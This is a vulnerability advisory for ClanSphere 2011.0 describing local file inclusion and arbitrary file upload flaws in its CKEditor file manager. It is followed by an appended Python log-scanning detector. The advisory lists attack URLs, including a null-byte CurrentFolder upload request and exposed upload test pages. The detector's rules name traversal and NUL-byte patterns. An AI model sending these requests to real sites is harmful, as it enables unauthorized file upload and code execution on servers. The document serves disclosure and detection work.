Vendor: ClanSphere
By:
CVSS: 7.5 (HIGH)
CWE: Local File Inclusion, Arbitrary File Upload
Product Name: ClanSphere
Affected Version From: ClanSphere 2011.0
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

ClanSphere Local File Inclusion and Arbitrary File Upload Vulnerabilities

ClanSphere is prone to a local file-include vulnerability and multiple arbitrary-file-upload vulnerabilities. An attacker can exploit these issues to upload arbitrary files onto the webserver, execute arbitrary local files within the context of the webserver, and obtain sensitive information.

Mitigation:

Patch or upgrade to a non-vulnerable version.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47636/info

ClanSphere is prone to a local file-include vulnerability and multiple arbitrary-file-upload vulnerabilities.

An attacker can exploit these issues to upload arbitrary files onto the webserver, execute arbitrary local files within the context of the webserver, and obtain sensitive information.

ClanSphere 2011.0 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/mods/ckeditor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=[LFI]%00
http://www.example.com/[Path]/mods/ckeditor/filemanager/connectors/test.html
http://www.example.com/[Path]/mods/ckeditor/filemanager/connectors/uploadtest.html
http://www.example.com/[Path]/mods/ckeditor/filemanager/browser/default/browser.html
http://www.example.com/[Path]/mods/ckeditor/filemanager/browser/default/frmupload.html
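
A detection sketch for the request patterns in the URL list above, added here as an example and not part of the original advisory: it flags access-log requests to the file manager connector whose CurrentFolder value carries a NUL byte or a parent-directory segment, and requests to the bundled test and upload pages. The Apache-style log format, the `/cs` install prefix and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Paths from the advisory's URL list, relative to the install path.
CONNECTOR = "/mods/ckeditor/filemanager/connectors/php/connector.php"
EXPOSED_PAGES = (
    "/mods/ckeditor/filemanager/connectors/test.html",
    "/mods/ckeditor/filemanager/connectors/uploadtest.html",
    "/mods/ckeditor/filemanager/browser/default/browser.html",
    "/mods/ckeditor/filemanager/browser/default/frmupload.html",
)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
_BASE = "/cs/mods/ckeditor/filemanager"  # assumed install prefix

# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    f'198.51.100.7 - - [01/May/2011:10:00:01 +0000] "POST {_BASE}/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2Fdocs%2F%00 HTTP/1.1" 200 312',
    f'198.51.100.7 - - [01/May/2011:10:00:02 +0000] "POST {_BASE}/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%252e%252e%2Fdocs HTTP/1.1" 200 312',
    f'203.0.113.9 - - [01/May/2011:10:00:03 +0000] "POST {_BASE}/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2F HTTP/1.1" 200 298',
    f'203.0.113.9 - - [01/May/2011:10:00:04 +0000] "GET {_BASE}/connectors/uploadtest.html HTTP/1.1" 200 4096',
    '203.0.113.9 - - [01/May/2011:10:00:05 +0000] "GET /cs/index.php HTTP/1.1" 200 9000',
]

def classify(line):
    """Return a finding string for one access-log line, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path).lower()
    if path.endswith(CONNECTOR):
        values = parse_qs(parts.query, keep_blank_values=True).get("CurrentFolder", [])
        folder = unquote("".join(values))  # second decode catches double encoding
        if "\x00" in folder:
            return "connector: NUL byte in CurrentFolder"
        if ".." in folder.replace("\\", "/").split("/"):
            return "connector: traversal segment in CurrentFolder"
        return "connector: request to file manager connector (review)"
    if any(path.endswith(p) for p in EXPOSED_PAGES):
        return "exposed: file manager test/upload page requested"
    return None

def scan(lines):
    """Return (line_number, finding) pairs for every flagged line."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := classify(line))]

if __name__ == "__main__":
    for n, finding in scan(SAMPLE_LOG):
        print(n, finding)
```

Because the entry lists no patch, any hit on the connector or the test pages is worth reviewing, and removing or denying access to those files takes away the exposed surface.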